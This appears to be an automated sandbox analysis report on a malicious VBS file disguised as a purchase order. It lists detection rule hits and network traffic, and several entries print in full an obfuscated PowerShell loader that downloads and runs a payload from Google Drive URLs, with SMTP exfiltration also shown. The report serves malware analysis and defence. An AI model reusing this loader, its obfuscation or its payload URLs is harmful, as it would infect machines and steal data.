Bo.tgTSuper:Fa,ri\ richD Trior,rdskyBolsmaPes,isArchi.RedbrtDefekxStryctSkn,e) nte{ CosteDoradx,oopri I,rat Farl}Co.se;Diakr ');$Knscelle = Preinterceded '.nvesePragtcSnknihProvioAnker Vnin%Sor,eaHovedpC,untpCountdSkopua AniktSamgiaCuck %leaka\Man,mMS peryEstrexHumblopostcgCardia espasUnde,t ForseS iklrPhon .,ngseOKindepCe.trvFolke Hypot&Pseud&Misco Fo,tyeColoucVigtihGstevo Spor alm$Udg.a ';Infatuatedly (Preinterceded 'G.lli$ NavlgYderllGalvaoCaptibomsteaCoryzlEvigt: sansB DiakoStilllProletSkovfa SkrinRise,tllebr=Dis b( Tor,c AtmomManifdGents Formi/.adjacSak.n Saf,$Stat.KFrondnIssensEnl rcSte,ie DronlBe kelAntikeN dkm)In,al ');Infatuatedly (Preinterceded 'Slide$CentrgTraktlN,ncooK,ssabCovenaFork,lSpyds: FretAUn,lefAktiot.mbyga orval.evrdeSaftekKlokkaqu drlDobb.eLed.an.nised.chize ranrNonchnAmbide Miscs Ox,p= apis$ GudeS
            Sigma detected: Invoke-Obfuscation STDIN+ Launcher
            Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Allentown = 1;$Ordknappestes='Substrin';$Ordknappestes+='g';Function Preinterceded($Veinwise){$Regnorms=$Veinwise.Length-$Allentown;For($Jargonium=5; $Jargonium -lt $Regnorms; $Jargonium+=(6)){$Woodener+=$Veinwise.$Ordknappestes.Invoke($Jargonium, $Allentown);}$Woodener;}function Infatuatedly($Beneficeforestillingernes191){. ($subcutaneous) ($Beneficeforestillingernes191);}$Indknebnes=Preinterceded 'HyperM Trveo givez StraiVejr.lOvervl CyanaGarde/ Myto5b.lli.Skved0Musik Appro(AcerrW,argaiThoseneskadd.lyveoUn,epwMahogsForsm MidtoNUnpu.TAllus Rveja1Share0Tales.Ove,f0Sp yd;Packw Has.WUprodiDecimnSemis6Upda.4Vaude;.saru J mcrxTwinn6 Hi c4 ph l;,assa FiberAlabavOpfin:Optag1 Tele2Under1Hlqnu. Ant.0Uni c) Sner ,rwinG.lapseMonercWightk Trano Unhe/Clime2Bibri0Westm1Folke0Taabe0Indsk1 Phle0Derhj1Svrme UdligFTimeli Philr Sa.deBla,sfJuvaloVar gx S,oe/Uegen1Syda.2Thurl1Under.Tra.y0 Slet ';$Sevenbommens=Preinterceded 'indtrU.ecansreilae DiplrRaphi-DeltaAB,ckbgSkak e ,ikrnCodswtIncom ';$Socionoms=Preinterceded 'dativhSole tBlaa.t.otlypU ions Pr i:Trima/Uninf/PeltidBiscarSolsii,ecapvBankaeCalpa.,ortagAktieoForkaoS.detgRepublUdenreFor l.Unac,cMash oBygnimByr e/Rud,sule escUng.r?Syncre Ko sxSids.p.rempoInputr L,lit Isop= SansdEnsidoMindewFilipn Ob.llKlyngoEddika,renddDoven&NaturiK,rofdTro t= Samf1 UnpaYCollieThebae Ph njPref.v LiteOT.grygVandrcCoequ5 NasiTTiresNAnskuFComplf MarmdI,jur9erind1 Allo7.ladd6 EjerEMisseDWater_Taa,t0DyspeKBlazysRapnd8FoderYCoteh3ChaufySynthn NediRDatakMKommeW Te n ';$Anskaffelsessummerne=Preinterceded 'Rumne>Chann ';$subcutaneous=Preinterceded 'RouteiFor,beLysstx.akey ';$Mesopodiale='Krnikens';Infatuatedly (Preinterceded 'Her.uS,ndebeStatutSt ej-geoaeCH.lakoL.llenTenodtReakte Apo,nSummetEr mi Adhsi-HomelPSkyggaSimontB,bonh lles formaTO duc:.ream\StigmDChagorDormiyStyrtaScrufsDi.re. J,lltS.warx ngsetinds, Su.p-F ekvVAscogaultralSkoleuDag,oe,nsgn Vandh$EtherME tadeYeomasTrilloSrettpChiliomora dUptubiByt ea.virkl.uinye Tros; Fin, ');Infatuatedly (Preinterceded ' Ae iigyrinfRadze Bjden(PrevotUnreneT.ggespatibtFratr-Necrop EvenaRo.entKabyshOm.in Bo.tgTSuper:Fa,ri\ richD Trior,rdskyBolsmaPes,isArchi.RedbrtDefekxStryctSkn,e) nte{ CosteDoradx,oopri I,rat Farl}Co.se;Diakr ');$Knscelle = Preinterceded '.nvesePragtcSnknihProvioAnker Vnin%Sor,eaHovedpC,untpCountdSkopua AniktSamgiaCuck %leaka\Man,mMS peryEstrexHumblopostcgCardia espasUnde,t ForseS iklrPhon .,ngseOKindepCe.trvFolke Hypot&Pseud&Misco Fo,tyeColoucVigtihGstevo Spor alm$Udg.a ';Infatuatedly (Preinterceded 'G.lli$ NavlgYderllGalvaoCaptibomsteaCoryzlEvigt: sansB DiakoStilllProletSkovfa SkrinRise,tllebr=Dis b( Tor,c AtmomManifdGents Formi/.adjacSak.n Saf,$Stat.KFrondnIssensEnl rcSte,ie DronlBe kelAntikeN dkm)In,al ');Infatuatedly (Preinterceded 'Slide$CentrgTraktlN,ncooK,ssabCovenaFork,lSpyds: FretAUn,lefAktiot.mbyga orval.evrdeSaftekKlokkaqu drlDobb.eLed.an.nised.chize ranrNonchnAmbide Miscs Ox,p= apis$ GudeS
            Sigma detected: Invoke-Obfuscation VAR+ Launcher
            Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Allentown = 1;$Ordknappestes='Substrin';$Ordknappestes+='g';Function Preinterceded($Veinwise){$Regnorms=$Veinwise.Length-$Allentown;For($Jargonium=5; $Jargonium -lt $Regnorms; $Jargonium+=(6)){$Woodener+=$Veinwise.$Ordknappestes.Invoke($Jargonium, $Allentown);}$Woodener;}function Infatuatedly($Beneficeforestillingernes191){. ($subcutaneous) ($Beneficeforestillingernes191);}$Indknebnes=Preinterceded 'HyperM Trveo givez StraiVejr.lOvervl CyanaGarde/ Myto5b.lli.Skved0Musik Appro(AcerrW,argaiThoseneskadd.lyveoUn,epwMahogsForsm MidtoNUnpu.TAllus Rveja1Share0Tales.Ove,f0Sp yd;Packw Has.WUprodiDecimnSemis6Upda.4Vaude;.saru J mcrxTwinn6 Hi c4 ph l;,assa FiberAlabavOpfin:Optag1 Tele2Under1Hlqnu. Ant.0Uni c) Sner ,rwinG.lapseMonercWightk Trano Unhe/Clime2Bibri0Westm1Folke0Taabe0Indsk1 Phle0Derhj1Svrme UdligFTimeli Philr Sa.deBla,sfJuvaloVar gx S,oe/Uegen1Syda.2Thurl1Under.Tra.y0 Slet ';$Sevenbommens=Preinterceded 'indtrU.ecansreilae DiplrRaphi-DeltaAB,ckbgSkak e ,ikrnCodswtIncom ';$Socionoms=Preinterceded 'dativhSole tBlaa.t.otlypU ions Pr i:Trima/Uninf/PeltidBiscarSolsii,ecapvBankaeCalpa.,ortagAktieoForkaoS.detgRepublUdenreFor l.Unac,cMash oBygnimByr e/Rud,sule escUng.r?Syncre Ko sxSids.p.rempoInputr L,lit Isop= SansdEnsidoMindewFilipn Ob.llKlyngoEddika,renddDoven&NaturiK,rofdTro t= Samf1 UnpaYCollieThebae Ph njPref.v LiteOT.grygVandrcCoequ5 NasiTTiresNAnskuFComplf MarmdI,jur9erind1 Allo7.ladd6 EjerEMisseDWater_Taa,t0DyspeKBlazysRapnd8FoderYCoteh3ChaufySynthn NediRDatakMKommeW Te n ';$Anskaffelsessummerne=Preinterceded 'Rumne>Chann ';$subcutaneous=Preinterceded 'RouteiFor,beLysstx.akey ';$Mesopodiale='Krnikens';Infatuatedly (Preinterceded 'Her.uS,ndebeStatutSt ej-geoaeCH.lakoL.llenTenodtReakte Apo,nSummetEr mi Adhsi-HomelPSkyggaSimontB,bonh lles formaTO duc:.ream\StigmDChagorDormiyStyrtaScrufsDi.re. J,lltS.warx ngsetinds, Su.p-F ekvVAscogaultralSkoleuDag,oe,nsgn Vandh$EtherME tadeYeomasTrilloSrettpChiliomora dUptubiByt ea.virkl.uinye Tros; Fin, ');Infatuatedly (Preinterceded ' Ae iigyrinfRadze Bjden(PrevotUnreneT.ggespatibtFratr-Necrop EvenaRo.entKabyshOm.in Bo.tgTSuper:Fa,ri\ richD Trior,rdskyBolsmaPes,isArchi.RedbrtDefekxStryctSkn,e) nte{ CosteDoradx,oopri I,rat Farl}Co.se;Diakr ');$Knscelle = Preinterceded '.nvesePragtcSnknihProvioAnker Vnin%Sor,eaHovedpC,untpCountdSkopua AniktSamgiaCuck %leaka\Man,mMS peryEstrexHumblopostcgCardia espasUnde,t ForseS iklrPhon .,ngseOKindepCe.trvFolke Hypot&Pseud&Misco Fo,tyeColoucVigtihGstevo Spor alm$Udg.a ';Infatuatedly (Preinterceded 'G.lli$ NavlgYderllGalvaoCaptibomsteaCoryzlEvigt: sansB DiakoStilllProletSkovfa SkrinRise,tllebr=Dis b( Tor,c AtmomManifdGents Formi/.adjacSak.n Saf,$Stat.KFrondnIssensEnl rcSte,ie DronlBe kelAntikeN dkm)In,al ');Infatuatedly (Preinterceded 'Slide$CentrgTraktlN,ncooK,ssabCovenaFork,lSpyds: FretAUn,lefAktiot.mbyga orval.evrdeSaftekKlokkaqu drlDobb.eLed.an.nised.chize ranrNonchnAmbide Miscs Ox,p= apis$ GudeS
            Sigma detected: WScript or CScript Dropper
            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Texas_Tool_Purchase_Order#T18834-1.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Texas_Tool_Purchase_Order#T18834-1.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Texas_Tool_Purchase_Order#T18834-1.vbs", ProcessId: 2464, ProcessName: wscript.exe
            Sigma detected: Suspicious Outbound SMTP Connections
            Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 66.29.159.53, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Program Files (x86)\Windows Mail\wab.exe, Initiated: true, ProcessId: 320, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49717
            Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
            Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Texas_Tool_Purchase_Order#T18834-1.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Texas_Tool_Purchase_Order#T18834-1.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Texas_Tool_Purchase_Order#T18834-1.vbs", ProcessId: 2464, ProcessName: wscript.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Allentown = 1;$Ordknappestes='Substrin';$Ordknappestes+='g';Function Preinterceded($Veinwise){$Regnorms=$Veinwise.Length-$Allentown;For($Jargonium=5; $Jargonium -lt $Regnorms; $Jargonium+=(6)){$Woodener+=$Veinwise.$Ordknappestes.Invoke($Jargonium, $Allentown);}$Woodener;}function Infatuatedly($Beneficeforestillingernes191){. ($subcutaneous) ($Beneficeforestillingernes191);}$Indknebnes=Preinterceded 'HyperM Trveo givez StraiVejr.lOvervl CyanaGarde/ Myto5b.lli.Skved0Musik Appro(AcerrW,argaiThoseneskadd.lyveoUn,epwMahogsForsm MidtoNUnpu.TAllus Rveja1Share0Tales.Ove,f0Sp yd;Packw Has.WUprodiDecimnSemis6Upda.4Vaude;.saru J mcrxTwinn6 Hi c4 ph l;,assa FiberAlabavOpfin:Optag1 Tele2Under1Hlqnu. Ant.0Uni c) Sner ,rwinG.lapseMonercWightk Trano Unhe/Clime2Bibri0Westm1Folke0Taabe0Indsk1 Phle0Derhj1Svrme UdligFTimeli Philr Sa.deBla,sfJuvaloVar gx S,oe/Uegen1Syda.2Thurl1Under.Tra.y0 Slet ';$Sevenbommens=Preinterceded 'indtrU.ecansreilae DiplrRaphi-DeltaAB,ckbgSkak e ,ikrnCodswtIncom ';$Socionoms=Preinterceded 'dativhSole tBlaa.t.otlypU ions Pr i:Trima/Uninf/PeltidBiscarSolsii,ecapvBankaeCalpa.,ortagAktieoForkaoS.detgRepublUdenreFor l.Unac,cMash oBygnimByr e/Rud,sule escUng.r?Syncre Ko sxSids.p.rempoInputr L,lit Isop= SansdEnsidoMindewFilipn Ob.llKlyngoEddika,renddDoven&NaturiK,rofdTro t= Samf1 UnpaYCollieThebae Ph njPref.v LiteOT.grygVandrcCoequ5 NasiTTiresNAnskuFComplf MarmdI,jur9erind1 Allo7.ladd6 EjerEMisseDWater_Taa,t0DyspeKBlazysRapnd8FoderYCoteh3ChaufySynthn NediRDatakMKommeW Te n ';$Anskaffelsessummerne=Preinterceded 'Rumne>Chann ';$subcutaneous=Preinterceded 'RouteiFor,beLysstx.akey ';$Mesopodiale='Krnikens';Infatuatedly (Preinterceded 'Her.uS,ndebeStatutSt ej-geoaeCH.lakoL.llenTenodtReakte Apo,nSummetEr mi Adhsi-HomelPSkyggaSimontB,bonh lles formaTO duc:.ream\StigmDChagorDormiyStyrtaScrufsDi.re. J,lltS.warx ngsetinds, Su.p-F ekvVAscogaultralSkoleuDag,oe,nsgn Vandh$EtherME tadeYeomasTrilloSrettpChiliomora dUptubiByt ea.virkl.uinye Tros; Fin, ');Infatuatedly (Preinterceded ' Ae iigyrinfRadze Bjden(PrevotUnreneT.ggespatibtFratr-Necrop EvenaRo.entKabyshOm.in Bo.tgTSuper:Fa,ri\ richD Trior,rdskyBolsmaPes,isArchi.RedbrtDefekxStryctSkn,e) nte{ CosteDoradx,oopri I,rat Farl}Co.se;Diakr ');$Knscelle = Preinterceded '.nvesePragtcSnknihProvioAnker Vnin%Sor,eaHovedpC,untpCountdSkopua AniktSamgiaCuck %leaka\Man,mMS peryEstrexHumblopostcgCardia espasUnde,t ForseS iklrPhon .,ngseOKindepCe.trvFolke Hypot&Pseud&Misco Fo,tyeColoucVigtihGstevo Spor alm$Udg.a ';Infatuatedly (Preinterceded 'G.lli$ NavlgYderllGalvaoCaptibomsteaCoryzlEvigt: sansB DiakoStilllProletSkovfa SkrinRise,tllebr=Dis b( Tor,c AtmomManifdGents Formi/.adjacSak.n Saf,$Stat.KFrondnIssensEnl rcSte,ie DronlBe kelAntikeN dkm)In,al ');Infatuatedly (Preinterceded 'Slide$CentrgTraktlN,ncooK,ssabCovenaFork,lSpyds: FretAUn,lefAktiot.mbyga orval.evrdeSaftekKlokkaqu drlDobb.eLed.an.nised.chize ranrNonchnAmbide Miscs Ox,p= apis$ GudeS

            Snort Signatures

            No Snort rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
            Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
            Multi AV Scanner detection for submitted file
            Source: Texas_Tool_Purchase_Order#T18834-1.vbsReversingLabs: Detection: 26%
            Source: Texas_Tool_Purchase_Order#T18834-1.vbsVirustotal: Detection: 30%Perma Link
            Source: unknownHTTPS traffic detected: 142.250.81.238:443 -> 192.168.2.5:49705 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.64.97:443 -> 192.168.2.5:49706 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.81.238:443 -> 192.168.2.5:49714 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.64.97:443 -> 192.168.2.5:49715 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49716 version: TLS 1.2
            Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2422882489.000000000870D000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000005.00000002.2411714026.0000000002F7F000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb.ene source: powershell.exe, 00000005.00000002.2418986473.0000000007680000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdb source: powershell.exe, 00000005.00000002.2418986473.00000000075B9000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000005.00000002.2418986473.0000000007680000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Management.Automation.pdbeW: source: powershell.exe, 00000005.00000002.2418986473.00000000075B9000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbS source: powershell.exe, 00000005.00000002.2422882489.000000000870D000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdbk source: powershell.exe, 00000005.00000002.2418986473.00000000075B9000.00000004.00000020.00020000.00000000.sdmp

            Software Vulnerabilities

            barindex
            Suspicious execution chain found
            Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Source: global trafficTCP traffic: 192.168.2.5:49717 -> 66.29.159.53:587
            Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
            Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
            Source: Joe Sandbox ViewIP Address: 66.29.159.53 66.29.159.53
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: api.ipify.org
            Source: unknownDNS query: name: api.ipify.org
            Source: unknownDNS query: name: api.ipify.org
            Source: global trafficTCP traffic: 192.168.2.5:49717 -> 66.29.159.53:587
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1YeejvOgc5TNFfd9176ED_0Ks8Y3ynRMW HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /download?id=1YeejvOgc5TNFfd9176ED_0Ks8Y3ynRMW&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1X5Z6Ep6ZepN6sGrS0WoIyU9d6ShS6N57 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1X5Z6Ep6ZepN6sGrS0WoIyU9d6ShS6N57&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1YeejvOgc5TNFfd9176ED_0Ks8Y3ynRMW HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /download?id=1YeejvOgc5TNFfd9176ED_0Ks8Y3ynRMW&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1X5Z6Ep6ZepN6sGrS0WoIyU9d6ShS6N57 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1X5Z6Ep6ZepN6sGrS0WoIyU9d6ShS6N57&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
            Source: unknownDNS traffic detected: queries for: drive.google.com
            Source: wab.exe, 00000008.00000002.3296966087.0000000023987000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3298114582.0000000025B20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
            Source: wab.exe, 00000008.00000002.3296966087.0000000023987000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3298114582.0000000025B20000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3296966087.0000000023B21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
            Source: powershell.exe, 00000002.00000002.2564623687.000001D6C586A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.google.com
            Source: powershell.exe, 00000002.00000002.2564623687.000001D6C58A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.usercontent.google.com
            Source: powershell.exe, 00000002.00000002.2687361282.000001D6D36DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2415922796.0000000005B56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: wab.exe, 00000008.00000002.3296966087.0000000023987000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3298114582.0000000025B20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
            Source: wab.exe, 00000008.00000002.3296966087.0000000023987000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3298114582.0000000025B20000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3296966087.0000000023B21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
            Source: powershell.exe, 00000005.00000002.2413115554.0000000004C48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2418986473.00000000075B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000002.00000002.2564623687.000001D6C3671000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2413115554.0000000004AF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: wab.exe, 00000008.00000002.3296966087.0000000023987000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3296966087.0000000023B21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://smtp.privateemail.com
            Source: powershell.exe, 00000005.00000002.2413115554.0000000004C48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2418986473.00000000075B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000002.00000002.2564623687.000001D6C3671000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: powershell.exe, 00000005.00000002.2413115554.0000000004AF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
            Source: powershell.exe, 00000002.00000002.2564623687.000001D6C586A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2564623687.000001D6C5890000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2564623687.000001D6C588C000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2397906567.00000000005AD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2397784995.0000000000597000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: powershell.exe, 00000005.00000002.2415922796.0000000005B56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000005.00000002.2415922796.0000000005B56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000005.00000002.2415922796.0000000005B56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000002.00000002.2564623687.000001D6C56AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.googP
            Source: powershell.exe, 00000002.00000002.2564623687.000001D6C56AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2564623687.000001D6C3898000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
            Source: wab.exe, 00000008.00000002.3277379903.0000000000508000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/5m
            Source: wab.exe, 00000008.00000002.3277379903.0000000000508000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/mmH
            Source: wab.exe, 00000008.00000002.3277379903.0000000000540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1X5Z6Ep6ZepN6sGrS0WoIyU9d6ShS6N57
            Source: wab.exe, 00000008.00000002.3277379903.0000000000540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1X5Z6Ep6ZepN6sGrS0WoIyU9d6ShS6N57-
            Source: powershell.exe, 00000002.00000002.2564623687.000001D6C3898000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1YeejvOgc5TNFfd9176ED_0Ks8Y3ynRMWP
            Source: powershell.exe, 00000005.00000002.2413115554.0000000004C48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1YeejvOgc5TNFfd9176ED_0Ks8Y3ynRMWXRll
            Source: powershell.exe, 00000002.00000002.2564623687.000001D6C5890000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.googh
            Source: powershell.exe, 00000002.00000002.2564623687.000001D6C5890000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2564623687.000001D6C3BAD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
            Source: wab.exe, 00000008.00000002.3277379903.000000000056A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: wab.exe, 00000008.00000003.2397906567.00000000005AD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2397784995.0000000000597000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3277379903.0000000000540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1X5Z6Ep6ZepN6sGrS0WoIyU9d6ShS6N57&export=download
            Source: powershell.exe, 00000002.00000002.2564623687.000001D6C5890000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2564623687.000001D6C3BAD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1YeejvOgc5TNFfd9176ED_0Ks8Y3ynRMW&export=download
            Source: powershell.exe, 00000005.00000002.2413115554.0000000004C48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2418986473.00000000075B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000002.00000002.2564623687.000001D6C4BCD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
            Source: powershell.exe, 00000002.00000002.2687361282.000001D6D36DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2415922796.0000000005B56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
